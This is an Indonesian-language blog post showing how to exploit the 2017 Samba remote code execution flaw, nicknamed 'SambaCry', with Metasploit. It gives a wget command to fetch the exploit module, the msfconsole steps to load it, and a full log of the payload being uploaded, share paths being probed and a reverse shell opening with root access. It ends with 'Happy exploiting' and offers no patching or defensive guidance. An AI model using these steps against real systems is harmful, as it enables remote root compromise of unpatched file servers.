Hmm sepertinya Remote Code Exploit juga menyerang Samba File Sharing di Linux nih? Akankah ada versi WannaCry Linux yang memanfaatkan celah ini? Atau harusnya diberi nama Sambacry?
wget https://raw.githubusercontent.com/hdm/metasploit-framework/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb -O /path/to/metasploit/modules/exploits/linux/samba/sambacry.rb
msfconsole msf > use exploit/linux/samba/sambacry msf exploit(sambacry) >
Logs :
[*] Started reverse TCP handler on 192.168.48.1:4444 [*] 192.168.48.151:445 - Using location 192.168.48.151shared for the path [*] 192.168.48.151:445 - Payload is stored in //192.168.48.151/shared/ as nCiuzQVt.so [*] 192.168.48.151:445 - Trying location /volume1/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /volume1/shared/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /volume1/SHARED/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /volume1/Shared/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /volume2/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /volume2/shared/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /shared/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /shared/shared/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /shared/SHARED/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /shared/Shared/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /mnt/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /mnt/shared/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /mnt/SHARED/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /mnt/Shared/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /mnt/usb/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /mnt/usb/shared/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /mnt/usb/SHARED/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /mnt/usb/Shared/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /media/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /media/shared/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /media/SHARED/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /media/Shared/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /mnt/media/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /mnt/media/shared/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /mnt/media/SHARED/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /mnt/media/Shared/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /var/samba/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /var/samba/shared/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /var/samba/SHARED/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /var/samba/Shared/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /tmp/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /tmp/shared/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /tmp/SHARED/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /tmp/Shared/nCiuzQVt.so... [*] 192.168.48.151:445 - Trying location /home/nCiuzQVt.so... [*] Command shell session 2 opened (192.168.48.1:4444 -> 192.168.48.1:45072) at 2017-05-24 19:40:33 -0500 id uid=0(root) gid=0(root) groups=0(root),100(users)
Kalau ada yang bingung silahkan tanya. Happy exploiting.
Leave a Reply